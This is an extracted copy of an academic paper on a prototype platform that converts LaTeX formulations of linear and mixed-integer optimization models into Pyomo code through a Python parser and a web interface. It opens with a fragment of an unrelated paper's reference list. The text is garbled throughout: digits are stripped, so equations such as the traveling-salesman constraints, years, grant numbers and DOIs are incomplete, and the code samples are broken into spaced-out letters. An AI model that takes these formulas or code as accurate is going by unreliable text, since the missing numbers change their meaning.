issues, techniques, and solutions. tkde. avirup sil and alexander yates. . re-ranking for joint named-entity recognition and linking. in pro- ceedings of the nd acm international conference on conference on information & knowledge management, pages – . acm. sameer singh, amarnag subramanya, fernando pereira, and andrew mccallum. . wikilinks: a large- scale cross-document coreference corpus labeled via links to wikipedia. technical report, university of massachusetts amherst, cmpsci technical report, um-cs- - . valentin i spitkovsky and angel x chang. . a cross- lingual dictionary for english wikipedia concepts. in lrec, pages – . . tac kbp entity selection. http://www.nist. gov/tac/ /kbp/task_guidelines/ tac_kbp_entity_selection_v . .pdf. michael wick, sameer singh, harshal pandya, and an- drew mccallum. . a joint model for discovering and linking entities. in cikm workshop on automated knowledge base construction (akbc). jiaping zheng, luke vilnis, sameer singh, jinho d. choi, and andrew mccallum. . dynamic knowledge- base alignment for coreference resolution. in confer- ence on computational natural language learning (conll). http://www.nist.gov/tac/ /kbp/task_guidelines/tac_kbp_entity_selection_v . .pdf http://www.nist.gov/tac/ /kbp/task_guidelines/tac_kbp_entity_selection_v . .pdf http://www.nist.gov/tac/ /kbp/task_guidelines/tac_kbp_entity_selection_v . .pdf submitted june accepted august published september corresponding author lazaros g. papageorgiou, l.papageorgiou@ucl.ac.uk academic editor marian gheorghe additional information and declarations can be found on page doi . /peerj-cs. copyright triantafyllidis and papageorgiou distributed under creative commons cc-by . open access an integrated platform for intuitive mathematical programming modeling using latex charalampos p. triantafyllidis , and lazaros g. papageorgiou centre for process systems engineering, department of chemical engineering, university college london, london, united kingdom smith school of enterprise and the environment, university of oxford, oxford, united kingdom abstract this paper presents a novel prototype platform that uses the same latex mark-up language, commonly used to typeset mathematical content, as an input language for modeling optimization problems of various classes. the platform converts the latex model into a formal algebraic modeling language (aml) representation based on pyomo through a parsing engine written in python and solves by either via neos server or locally installed solvers, using a friendly graphical user interface (gui). the distinct advantages of our approach can be summarized in (i) simplification and speed-up of the model design and development process (ii) non-commercial character (iii) cross-platform support (iv) easier typo and logic error detection in the description of the models and (v) minimization of working knowledge of programming and amls to perform mathematical programming modeling. overall, this is a presentation of a complete workable scheme on using latex for mathematical programming modeling which assists in furthering our ability to reproduce and replicate scientific work. subjects optimization theory and computation, scientific computing and simulation, programming languages, software engineering keywords pyomo, python, algebraic modeling languages, mathematical programming, optimization, latex introduction mathematical modeling constitutes a rigorous way of inexpensively simulating complex systems’ behavior in order to gain further understanding about the underlying mechanisms and trade-offs. by exploiting mathematical modeling techniques, one may manipulate the system under analysis so as to guarantee its optimal and robust operation. the dominant computing tool to assist in modeling is the algebraic modeling languages (amls) (kallrath, ). amls have been very successful in enabling a transparent development of different types of models, easily distributable among peers and described with clarity, effectiveness and precision. software suites such as aimms (bisschop & roelofs, ), gams ide (mccarl et al., ), jump (dunning, huchette & lubin, ) as the modeling library in julia (lubin & dunning, ), pyomo (http://www.pyomo.org/) (hart et al., ; hart, watson & woodruff, ) for modeling in python (https://www.python.org/), (rossum, ) and ampl (fourer, gay how to cite this article triantafyllidis and papageorgiou ( ), an integrated platform for intuitive mathematical programming model- ing using latex. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:l.papageorgiou@ucl.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://www.pyomo.org/ https://www.python.org/ http://dx.doi.org/ . /peerj-cs. figure the levels of abstraction in modeling; from natural language to extracting the optimal solu- tion via computational resources. full-size doi: . /peerjcs. /fig- & kernighan, ) are the most popular and widely used in both academia and industry. amls usually incorporate the following features: • a strict and specific syntax for the mathematical notation to describe the models; • solver interfaces, the bridge between mathematics and what the solver can understand in terms of structural demands; • a series of available optimization solvers for as many classes of problems as supported (lp, milp, minlp etc.) with the associated functional interfaces implemented; • explicit data file formats and implementation of the respective import/export mechanisms. amls provide a level of abstraction, which is higher than the direct approach of generating a model using a programming language. the different levels in the design process of a model are depicted in fig. . extending an aml (or even the entire modeling design process)canbe doneinthefollowing twoways: wecaneithersimplifythe presentframework (vertical abstraction) or extend the embedded functionality (horizontal abstraction) (jackson, ). the layers of abstraction between the conception and the semantics of a mathematical model and its computational implementation may not necessarily be thin. this means that while eventually the aim of the presented platform has the same purpose as an aml that is to generate and solve models, simplification of the required syntax to describe the model is associated with higher complexity. thus, in order to relax the syntactical requirements, we have to be able to process the same model with limited information (for instance, we do not declare index sets and parameters in the platform). this limited declaration of model components elevates the amount of processing that the platform has to conduct in order to provide equivalent formulations of the input. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a systems approach, mosaic (erik et al., ), has been developed based on a mathml representation using latex extracts, which has been applied mainly to chemical engineering models. both frameworks can be facilitated online, with the proposed framework built on django while mosaic on java. it can be noted that our platform can also be run off-line (locally). a key difference between the two is that in the proposed framework the user does not explicitly define indices, parameters and dynamic sets as those are identified automatically from the platform, by filtering them out from the variable list given at the bottom of the input .tex model. in the proposed platform the user can capture the entire optimization model in a single .tex file and use this directly as an input to the platform as opposed of using latex extracts for generating equations in mosaic. similarly though, both platforms are framing the use of latex built-in commands for the specific environment to better capture errors and provide more consistency. finally, the proposed platform exports the generated optimization model in pyomo whereas the ability to export in many other formats is given in the mosaic environment. our work expands upon two axes: (i) the programming paradigm introduced by donald e. knuth (knuth, ) on literate programming and (ii) the notions of reproducible and replicable research, the fundamental basis of scientific analysis. literate programming focuses on generating programs based on logical flow and thinking rather than being limited by the imposing syntactical constraints of a programming language. in essence, we employ a simple mark-up language, latex, to describe a problem (mathematical programming model) and then in turn produce compilable code (pyomo abstract model) which can be used outside of the presented prototype platform’s framework. reproducibility and the ability to replicate scientific analysis is crucial and challenging to achieve. as software tools become the vessel to unravel the computational complexity of decision-making, developing open-source software is not necessarily sufficient; the ability for the averagely versed developer to reproduce and replicate scientific work is very important to effectively deliver impact (leek & peng, ; nature methods editorial board, ). to quote the coin-or foundation (https://www.coin-or.org/), science evolves when previous results can be easily replicated. in the endeavor of simplifying the syntactical requirements imposed by amls we have developed a prototype platform. this new framework is materializing a level of modeling design that is higher than the amls in terms of vertical abstraction. it therefore strengthens the ability to reproduce and replicate optimization models across literature for further analysis by reducing the demands in working knowledge of amls or coding. the key capability is that it parses latex formulations of mathematical programs (optimization problems) directly into pyomo abstract models. the framework then combines the produced abstract model with data provided in the ampl .dat format (containing parameters and sets) to produce a concrete model. this capability is provided through a graphical interface which accepts latex input and ampl data files, parses a pyomo model, solves with a selected solver (cplex, glpk, or the neos server), and returns the optimal solution if feasible, as the output. the aim is not to substitute but to establish a link between those using a higher level of abstraction. therefore, the platform does not eliminate the use of an aml or the advantages emanating from it. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.coin-or.org/ http://dx.doi.org/ . /peerj-cs. this is a complete prototype workable scheme to address how latex could be used as an input language to perform mathematical programming modeling, and currently supports linear programming (lp), mixed-integer linear programming (milp) as well as mixed-integer quadratic programming (miqp) formulations. linear optimization (bertsimas & tsitsiklis, ; williams, ) has proven to be an invaluable tool for decision support. the corpus of models invented for linear optimization over the past decades and for a multitude of domains has been consistently increasing. it can be easily demonstrated with examples in machine learning, operations research and management science, physics, information security, environmental modeling and systems biology among many others (yang et al., ; tanveer, ; silva et al., ; sitek & wikarek, ; liu & papageorgiou, ; triantafyllidis et al., ; cohen et al., ; romeijn et al., ; mitsos et al., ; melas et al., ; kratica, dugošija & savić, ; mouha et al., ). this paper is organized as follows: in ‘functionality’, we describe the current functionality supported by the platform at this prototype stage. in ‘parser - execution engine’, we present the implementation details of the parser. ‘an illustrative parsing example’ provides a description of an illustrative example. a discussion follows in ‘discussion’. some concluding remarks are drawn in ‘conclusion’. examples of optimization models that were reproduced from scientific papers as well as their corresponding latex formulations and pyomo models can be found in the supplemental information . functionality the set of rules that are admissible to formulate models in this platform are formal latex commands and they do not represent in-house modifications. we assume that the model will be in the typical format that optimization programs commonly appear in scientific journals. therefore, the model must contain the following three main parts and with respect to the correct order as well: . the objective function to be optimized (either maximized or minimized); . the (sets of) constraints, or else the relationships between the decision variables and coefficients, right-hand side (rhs); . the decision variables and their domain space. we used the programming environment of python coupled with its modeling library, namely pyomo. similar approaches in terms of software selection have been presented for differential and algebraic equations (dae) modeling and optimization in (nicholson et al., ; nikolić, ). by combining python and pyomo we have the ability to transform a simplified representation of a mathematical model initially written in latex into a formal aml formulation and eventually optimize it. in other words, the platform reads latex code and then writes pyomo abstract models or the code generates code. the resulting .py file is usable outside of the platform’s frame, thus not making the binding and usage of these two necessary after conversion. the main components that we employed for this purpose are the following: triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure the simplified graphical user interface (gui). the gui contains the basic but fundamental options to use the platform, such as model input, solver selection and solution extraction. full-size doi: . /peerjcs. /fig- • front-end: html, javascript, mathjax (https://www.mathjax.org/) and google polymer (https://www.polymer-project.org/); • back-end: python with django (https://www.djangoproject.com/) and pyomo. in order to increase the effectiveness and user-friendliness of the platform, a graphical- user interface (gui) based on html, javascript (front-end) and django as the web- framework (back-end) has been implemented, as shown in fig. . the user-input is facilitated mainly via polymer objects (https://www.polymer-project.org/). as the main feature of the platform is to allow modeling in latex language, we used mathjax as the rendering engine. in this way, the user can see the compiled version of the input model. all of these components form a single suite that works across different computational environments. the front-end is plain but incorporates the necessary functionality for input and output, as well as some solver options. the role of the back-end is to establish the communication between the gui and the parser with the functions therein. in this way the inputs are being processed inside python in the background, and the user simply witnesses a seamless working environment without having to understand the black-box parser in detail. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.mathjax.org/ https://www.polymer-project.org/ https://www.djangoproject.com/ https://www.polymer-project.org/ http://dx.doi.org/ . /peerj-cs. the main components of the gui are: • abstract model input: the input of the latex model, either directly inside the polymer input text-box or via file upload (a .tex containing the required source latex code) • data files: the input of the data set which follows the abstract definition of the model via uploading the ampl-format (.dat) data file • solver options: an array of solver - related options such as: . neos server job using cplex . solve the relaxed lp (if milp) . select gplk (built-in) as the optimization solver . select cplex (if available) as the optimization solver (currently set to default) the following is an example of a latex formulated optimization problem which is ready to use with the platform; the well-known traveling salesman problem (tsp) (applegate et al., ): minimize ∑ i,j:i =j (di,jxi,j) subject to : ∑ j:i =j (xi,j)= ∀i ∑ i:i =j (xi,j)= ∀j ui−uj+nxi,j ≤n− ∀i≥ ,j≤|j|− ,i = j u∈z,x ∈{ , } and the raw latex code used to generate this was: \ t e x t { minimize } \ sum \ l i m i t s _ { i , j : i \ neq j }^{} ( d_ { i , j } x_ { i , j } ) \ \ \ t e x t { s u b j e c t to : } \ \ \ sum \ l i m i t s _ { j : i \ neq j }^{} ( x_ { i , j } ) = \ quad \ quad \ f o r a l l i \ \ \ sum \ l i m i t s _ { i : i \ neq j }^{} ( x_ { i , j } ) = \ quad \ quad \ f o r a l l j \ \ u_ { i } − u_ { j } + nx_ { i , j } \ l e q n − \ quad \ quad \ f o r a l l i \ geq , j \ l e q | j |− , i \ neq j \ \ u \ in \ mathbb z , x \ in \ { , \ } \ \ which is the input for the platform. the user can either input this code directly inside the google polymer text box or via a pre-made .tex file which can be uploaded in the corresponding field of the gui. either way, the mathjax engine then renders latex appropriately so the user can see the resulting compiled model live. subject to syntax- errors, the mathjax engine might or might not render the model eventually, as naturally expected. empty lines or spaces do not play a role, as well as commented-out lines using the standard notation (the percentage symbol %). the model file always begins with the objective function sense, the function itself, and then the sets of constraints follow, with the variables and their respective type at the end of the file. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the overall flow of the implementation. from user input to solving the optimization problem or simply exporting the equivalent pyomo model file. full-size doi: . /peerjcs. /fig- parser—execution engine as parser we define the part of the code (a collection of python functions) in the back-end side of the platform which is responsible for translating the model written in latex to pyomo, the modeling component of the python programming language. in order to effectively translate the user model input from latex, we need an array of programming functions to carry out the conversion consistently since preserving the equivalence of the two is implied. the aim of the implementation is to provide minimum loss of generality in the ability to express mathematical notation for different modeling needs. a detailed description of the implemented scheme is given in fig. . a modular design of different functions implemented in python and the established communication of those (exchanging input and output-processed data) form the basic implementation concept. this type of design allows the developers to add functionality in a more clear and effective way. for instance, to upgrade the parser and support mixed integer quadratic programming (miqp) problems, an update only to the parsing function assigned to convert the optimization objective function is required. once the .tex model file and the .dat ampl formatted data file are given, the platform then starts processing the model. the conversion starts by reading the variables of the model and their respective types, and then follows with component identification triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (locating the occurrence of the variables in each constraint) and their inter-relationships (multiplication, division, summation etc.). additionally, any summation and constraint conditional indexing schemes will be processed separately. constraint-by-constraint the parser gradually builds the .py pyomo abstract model file. it then merges through pyomo the model with its data set and calls the selected solver for optimization. pre-processing a significant amount of pre-processing takes place prior of parsing. the minimum and essential is to first tidy up the input; that is, clear empty lines and spaces, as well as reserved (by the platform) keywords that the user can include but do not play any role in functional parsing (such as the \quad command). the platform also supports the use of greek letters. for instance, if a parameter is declared as α the platform identifies the symbol, removes the backslash and expects to find alpha in the data-file. this takes place also in the pre-processing stage. the user can also opt-out selectively the constraints by putting regular comments in latex, with the insertion of the percentage symbol (%) in the beginning of each expression. once done, we attempt to simplify some types of mathematical expressions in order to be able to better process them later on. more specifically, we have two main functions that handle fractions and common factor (distributive expressions) simplifications. for example: aibj di is then converted to: (aibj)/di and β(α+ ) is converted as expected to: βα+β when handling fractions, the user can employ the frac environment to generate them; the parser in the background always though processes the analytic form (the same applies with the distributive form of multiplications), no matter if the initial input was done using the frac environment. this keeps the basic component identification functions intact, since their input is transformed first to the acceptable analytical format. instead of transforming the parsing functions, we transform the input in the acceptable format. however, the user does not lose either functionality or flexibility, as this takes place in the background. to put it simply, either the user inputs the analytic form of an expression or the compact, the parser is still able to function correctly. to frame the capabilities of the parser, we will now describe how the user can define optimization models in the platform with a given example and the successful parsing to pyomo. the parser first attempts to split the model into its three major distinct parts: • the objective function • the sets of constraints • the types of the variables defined these three parts are in a way independent but interconnected as well. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. processing variables the parser first attempts to read the variables and their respective domain space (type). the platform is case sensitive since it is based on pyomo. the processing is done using string manipulation functions, therefore the use of regular expressions in python was essential and effective. reasonably, the focus was on consistency and reliability, rather computational performance mainly due to the lightweight workload of the processing demands in general. in order to do that, the parser uses keywords as identifiers while scanning from the top to the bottom of the manually curated .tex file which contains the abstract model in latex. for the three respective different parts mentioned earlier, the corresponding identifiers are: . objective function: {minimize, maximize} . sets of constraints: {\leq, \geq, =} . variables and their types: {\mathbb , { , }} this helps separate the processing into sections. each section is analyzed and passes the information in pyomo syntax in the .py output model file. variable types can appear in the following way: • \in \mathbb r for real numbers (∈r) • \in \mathbb r_+ for non-negative real numbers (∈r+) • \in \mathbb r_{*}^{+} for positive real numbers (∈r+ ∗ ) • \in \{ , \} for binary variables (∈{ , }) • \in \mathbb z for integers (∈z) • \in \mathbb z_+ for non-negative integers (∈z+) • \in \mathbb z_{*}^{+} for positive integers (∈z+ ∗ ) in order to avoid confusion between lowercase and uppercase, the identifiers are converted to uppercase prior of comparison. upon locating these keywords, the parser separates the processing and starts calling the corresponding functions. once the variables and their types are processed (expected to be found at the bottom of the mathematical definition of the model), the parser then creates a list of strings for the names of the variables. this is one of the crucial structures of the parser and utilized alongside the entire run-time of the conversion process. a list of the same length, which holds the types of each respective variable, is also created. the platform in general uses python lists to store information about variables, index sets, parameters, scalars etc. decomposing constraints and objective function expressions our approach for understanding the inter-mathematical relationships between the variables and the parameters relied on exploiting the fundamental characteristics of linear programming: triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a simple constraint having its components (partially) decomposed and therefore identified; summations, operators, scalars and numerical quantities. full-size doi: . /peerjcs. /fig- • proportionality • additivity • divisibility these mathematical relationships can help us understand the structure of the expressions and how to decompose them. by decomposition we define the fragmentation of each mathematical expression at each line of the .tex input model file into the corresponding variables, parameters, summations etc. so as we can process the given information accordingly. a simple graphical example is given in fig. . the decomposition with the regular expressions is naturally done via the strings of the possible operators found, that is: addition, subtraction, division (+,−,/), since the asterisk to denote multiplication (∗or ·) is usually omitted in the way we describe the mathematical expressions (e.g., we write ax to describe coefficient a being multiplied by variable x). in some cases however it is imperative to use the asterisk to decompose a multiplication. for example, say ds is a parameter and s is also a variable in the same model. there is no possible way to tell whether the expression ds actually means d*s or if it is about a new parameter altogether, since the parameters are not explicitly defined in the model definition (as in amls). adding to that the fact that for the scalars there is no associated underscore character to identify the parameter as those are not associated with index sets, the task is even more challenging. therefore, we should write d*s if d is a scalar. as for parameters with index sets, for example dsisi causes no confusion for the parser because the decomposition based on the underscore character clearly reveals two separate components. in this way, the platform also identifies new parameters. this means that since we know, for instance, that s is a variable but ds is not, we can dynamically identify ds on the fly (as triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we scan the current constraint) as being a parameter which is evidently multiplied with variable s, both having index set i associated with them. however, we need to pay attention on components appearing iteratively in different or in the same sets of constraints; did we have the component already appearing previously in the model again? in that case we do not have to declare it again in the pyomo model as a new quantity, as that would cause a modeling error. by declaration we mean the real-time execution of a python command that creates the associated terms inside the pyomo abstract objected-oriented (oo) model. for instance if a set i is identified, the string model.i=set(dimen= ) is first written inside the text version of the pyomo model file, and then on-the-fly executed independently inside the already parsing python function using the exec command. the execution commands run in a sequential manner. all the different possible cases of relationships between parameters and variables are dynamically identified, and the parser keeps track of the local (per constraint) and global (per model) list of parameters identified while scanning the model in dynamically growing lists. dynamic identification of the parameters and index sets is one of the elegant features of the platform, since in most algebraic modeling languages (amls) the user explicitly defines the model parameters one-by-one. in our case, this is done in an intelligent automated manner. another important aspect of the decomposition process is the identification of the constraint type (<=,=,>=), since the position of the operator is crucial to separate the left and the right hand side of the constraint. this is handled by an independent function. decomposition also helps identify quadratic terms. by automatic conversion of the caret symbol to ∗∗ (as this is one of the ways to denote power of a variable in pyomo language) the split function carefully transfers this information intact to the pyomo model. summations and conditional indexing summation terms need to be enclosed inside parentheses (···), even with a single component. this accelerates identification of the summation terms with clarity and consistency. summations are in a way very different than processing a simplified mathematical expression in the sense that we impose restrictions on how a summation can be used. first of all, the corresponding function to process summations tries to identify how many summation expressions exist in each constraint at a time. their respective indexing expressions are extracted and then sent back to the index identification functions to be processed. the assignment of conditional indexing with the corresponding summation is carefully managed. then, the summation commands for the pyomo model file are gradually built. summations can be expressed in the following form, and two different fields can be utilized to exploit conditional indexing (upper and lower brackets): \ sum \ l i m i t s _ { p : x_{n , p } = }^{}( − sb_ {p , k } ) which then compiles to: ∑ p:xn,p= ( −sbp,k) this means that the summation will be executed for all values of p, (that is for p= : |p|) but only when xn,p= at the same time. if we want to use multiple and stacked summations triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (double, triple etc.) we can express them in the same way by adding the indexes for which the summation will be generated, as for example: \ sum \ l i m i t s _ { i , j }^ {} ( x_{ i , j } ) which then compiles to: ∑ i,j(xi,j) and will run for the full cardinality of sets i,j. dynamic (sparse) sets imposed on constraints can be expressed as: x_{ i , j } = y_{ i , j } \ f o r a l l ( i , j ) \ in c \ \ which then compiles to: xi,j =yi,j ∀(i,j)∈c this means that the constraint is being generated only for those values of (i,j) which belong to the dynamic set c. in order to achieve proper and precise processing of summations and conditional indexing, we have built two separate functions assigned for the respective tasks. since specific conditional indexing schemes can take place both for the generation of an entire constraint or just simply for a summation inside a constraint, two different sub-functions process this portion of information. this is done using the \forall command at the end of each constraint, which changes how the indexes are being generated for the vertical expansion of the constraints from a specific index set. concerning summations it is done with the bottom bracket information for horizontal expansion, as we previously saw, for instance, with p :xn,p= . a series of challenges arise when processing summations. for instance, which components are inside a summation symbol? a variable that might appear in two different summations at the same constraint can cause confusion. thus, using a binary list for the full length of variables and parameters present in a constraint we identify the terms which belong to each specific summation. this binary list gets re-initialized for each different summation expression. from the lower bracket of each summation symbol, the parser is expecting to understand the indexes for which the summation is being generated. this is done by either simply stating the indexes in a plain way (for instance a,b) or if a more complex expression is used, the for-loop indexes for the summations are found before the colon symbol (:). constraint indexing at the end of each constraint, the parser identifies the ‘‘ ∀’’’ (\forall) symbol which then helps understand for which indexes the constraints are being sequentially generated (vertical expansion). for instance, ∀(i,j)∈c makes sure that the constraint is not generated for all combinations of index sets i,j, but only the ones appearing in the sparse set c. the sparse sets are being registered also on the fly, if found either inside summation indexing brackets or in the constraint general indexing (after the∀ symbol) by using the keywords \in, \notin. the simplest form of constraint indexing is for instance:∑ j:i =j (xi,j)= ∀i, where the constraint is vertically expanding for all elements of set i and the summation is running for all those values of set j such that i is not equal to j. more advanced cases of triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. constraint conditional indexing are also identified, as long as each expression is separated with the previous one by using a comma. for example in: ∀i< |i|,j≥ i+ we see each different expression separated so the parser can process the corresponding indexing. three different functions handle identification on constraint- level and the input for the general function that combines these three, accepts as input the whole expression. we process each component (split by commas) iteratively by these three functions: . to identify left part (before the operator/reserved keyword/command), . the operator and . the right-hand part. for example, in i< |i|, the left part is set i, the operator is < and the right-hand part is the cardinality of set i. in this way, by adding a new operator in the acceptable operators list inside the code, we allow expansion of supported expressions in a straightforward manner. an illustrative parsing example let us now follow the sequential steps that the parser takes to convert a simple example. consider the well-known transportation problem: minimize ∑ i,j (ci,jxi,j) subject to: ∑ j (xi,j)≤ai ∀i ∑ i (xi,j)≥bj ∀j x ∈r+ we will now provide in-depth analysis of how each of the main three parts in the model can be processed. variables the parser first attempts to locate the line of the .tex model file that contains the variable symbols and their respective domains. this is done by trying to identify any of the previously presented reserved keywords specifically for this section. the parser reaches the bottom line by identifying the keyword mathbbr_+ in this case. commas can separate variables belonging to the same domain, and the corresponding parsing function splits the collections of variables of the same domain and processes them separately. in this case, the parser identifies the domain and then rewinds back inside the string expression to find the variable symbols. it finds no commas, thus we collect only one variable with the symbol x. the platform then builds two python lists with the name of the variables found and their respective types. triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. objective function the parser then reads the optimization sense (by locating the objective function expression using the keywords, in this case minimize) and tries to identify any involved variables in the objective function. in a different scenario, where not all of the model variables are present in the objective function, a routine identifies one-by-one all the remaining variables and their associated index sets in the block of the given constraint sets. the parser first attempts to locate any summation symbols. since this is successful, the contained expression is extracted as c{i,j}x{i,j}, by locating the parentheses bounds (). in case of multiple summations, or multiple expressions inside the parentheses, we process them separately. the bounds of the summation symbol (the lower and upper brackets) respectively will be analyzed separately. in this case, the upper one is empty, so the lower one contains all the indexes for which the summation has to scale. separated by commas, a simple extraction gives i,j to be used for the pyomo for-loop in the expression. there is no colon identified inside the lower bracket of the summation, thus no further identification of conditional indexing is required. a split function is then applied on the extracted mathematical expression c_{i,j}x_{i,j} to begin identification of the involved terms. since there are no operators (∗,+,−,/) we have a list containing only one item; the combined expression. it follows that the underscore characters are used to frame the names of the respective components. it is easy to split on these characters and then create a list to store the pairs of the indexes for each component. thus, a sub-routine detects the case of having more than just one term in the summation-extracted expression. in this example, c is automatically identified as a parameter because of its associated index set which was identified with the underscore character and since it does not belong to the list of variables. the global list of parameters is then updated by adding c, as well as the parameters for the current constraint/objective expression. this helps us clarify which parameters are present in each constraint as well as the set of parameters (unique) for the model thus far, as scanning goes on. once the parameter c and variable x are identified and registered with their respective index sets, we proceed to read the constraint sets. the parser creates expressions as the ones shown below for this kind of operations: model . i = set ( dimen = ) \ \ model . j = set ( dimen = ) \ \ model . c = param ( model . i , model . j , i n i t i a l i z e = ) \ \ model . x = var ( model . i , model . j , domain=nonnegativereals ) \ \ since the objective function summation symbol was correctly identified with the respective indexes, the following code is generated and executed: def o b j _ e x p r e s s i o n ( model ) : model . f = sum( model . c [ i , j ]∗model . x [ i , j ] f o r i in model . i f o r j in model . j ) retu rn model . f model . obj = o b j e c t i v e ( r u l e =obj_expression , s e ns e = minimize ) constraints since the constraints sets are very similar, for shortness we will only analyze the first one. the parser first locates the constraint type by finding either of the following operators triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ≤,≥,=. it then splits the constraint in two parts, left and right across this operator. this is done to carefully identify the position of the constraint type operator for placement into the pyomo constraint expression later on. the first component the parser gives is the terms identified raw in the expression ([′x′i,j, ′a′i]). parameter a is identified on the fly and since x is already registered as a variable and the parser proceeds to only register the new parameter by generating the following pyomo expressions: model . a = param ( model . i , i n i t i a l i z e = ) the platform successfully identifies which terms belong to the summation and which do not and separates them carefully. eventually the ∀ symbol gives the list of indexes for which the constraints are being generated. this portion of information in the structure of a pyomo constraint definition goes in replacing x in the following piece of code: def a x b _ c o n s t r a i n t _ r u l e _ ( model , x) : and the full resulting function is: def a x b _ c o n s t r a i n t _ r u l e _ ( model , i ) : model . c_ = sum( model . x [ i , j ] f o r j in model . j ) <= model . a [ i ] retu rn model . c_ model . axbconstraint_ =c o n s t r a i n t ( model . i , r u l e = a x b _ c o n s t r a i n t _ r u l e _ ) discussion developing a parser that would be able to understand almost every different way of writing mathematical models using latex is nearly impossible; however, even by framing the way the user could write down the models, there are some challenges to overcome. for instance, the naming policy for the variables and parameters. one would assume that these would cause no problems but usually this happens because even in formal modeling languages, the user states the names and the types of every component of the problem. starting from the sense of the objective function, to the names and the types of the variables and parameters as well as their respective sizes and the names of the index sets, everything is explicitly defined. this is not the case though in this platform; the parser recognizes the parameters and index sets with no prior given information. this in turn imposes trade-offs in the way we write the mathematical notation. for instance, multiple index sets have to be separated by commas as in xi,j instead of writing xij. on the other hand, using symbolic representation of the models in latex can enable the user quickly identify errors in the description of the model, the involved variables, parameters or their mathematical relationships therein. this as opposed trying to debug models that have been developed directly in a programming language or in an aml, which would make the detection of such errors or typos more challenging. by scanning a constraint, the parser quickly identifies as mentioned the associated variables. in many cases parameters and variables might have multiple occurrences in the same constraint. this creates a challenging environment to locate the relationships triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the parameters and the variables since they appear in multiple locations inside the string expressions and in different ways. on top of this, the name of a parameter can cause identification problems because it might be a sub/super set of the name of another parameter, e.g., parameter ab, and parameter abc. therefore naming conflicts are carefully resolved by the platform by meticulously identifying the exact location and occurrences of each term. the cpu time required for each step in the modeling process of the platform (conversion from latex to pyomo, pyomo model generation, solver) can be found in the supplementary information. it can be noted that the parser is the least consuming step, which clearly demonstrates the efficiency of the platform. the pyomo model generation and solver (cplex in our measurements) steps and their associated cpu-time are completely outside of the parser’s control. however, it is essential to get an idea of how these timings compare to each other with the addition of this extra higher level of abstraction in the beginning of the modeling process. challenges also arise in locating which of the terms appearing in a constraint belong to summations, and to which summations; especially when items have multiple occurrences inside a constraint, there needs to be a unique identification so as to include a parameter (or a variable) inside a specific summation or not. we addressed this with the previously introduced binary lists. then, for each of those summation symbols, the items activated ( ) are included in the summation or not ( ) and the list is generated for each different summation within the expression. additionally, another challenge constitutes the extension of the platform to support nonlinear terms, where each term itself can be a combination of various operators and mathematical functions. finally, it is worth mentioning that the amount of lines/characters to represent a model in latex in comparison with the equivalent model in pyomo is substantially smaller. in this respect, the platform accelerates the modeling development process. conclusions we presented a platform for rapid model generation using latex as the input language for mathematical programming, starting with the classes of lp, milp and miqp. the platform is based on python and parses the input to pyomo to successfully solve the underlying optimization problems. it uses a simple gui to facilitate model and data input based on django as the web-framework. the user can exploit locally installed solvers or redirect to neos server. this prototype platform delivers transparency and clarity, speedup of the model design and development process (by significantly reducing the required characters to type the input models) and abstracts the syntax from programming languages and amls. it therefore delivers reproducibility and the ability to replicate scientific work in an effective manner from an audience not necessarily versed in coding. future work could possibly involve expansion to support nonlinear terms as well as differential and algebraic equations, sanity checking and error catching on input, the ability to embed explanatory comments in the input model file which would transfer to the target aml, triantafyllidis and papageorgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. extending the functionality concerning bounds on the variables as well as adding further support to built-in latex commands (such as\left[]) which would capture more complex mathematical relationships. acknowledgements we would like to thank prof. eric fraga and dr. aristotelis kittas for useful discussions. additional information and declarations funding this work was supported by the leverhulme trust under grant (no. rpg- - ) and the uk engineering and physical sciences research council (no. ep/m / ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: leverhulme trust under grant: rpg- - . uk engineering and physical sciences research council: ep/m / . competing interests the authors declare there are no competing interests. author contributions • charalampos p. triantafyllidis performed the experiments, analyzed the data, prepared figures and/or tables, performed the computational work, authored or reviewed drafts of the paper. • lazaros g. papageorgiou conceived and designed the experiments, analyzed the data, performed the computational work, authored or reviewed drafts of the paper, approved the final draft. data deposition the following information was supplied regarding data availability: the raw data used for examples presented in this paper are provided in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references applegate dl, bixby re, chvatal v, cook wj. . the traveling salesman problem: a computational 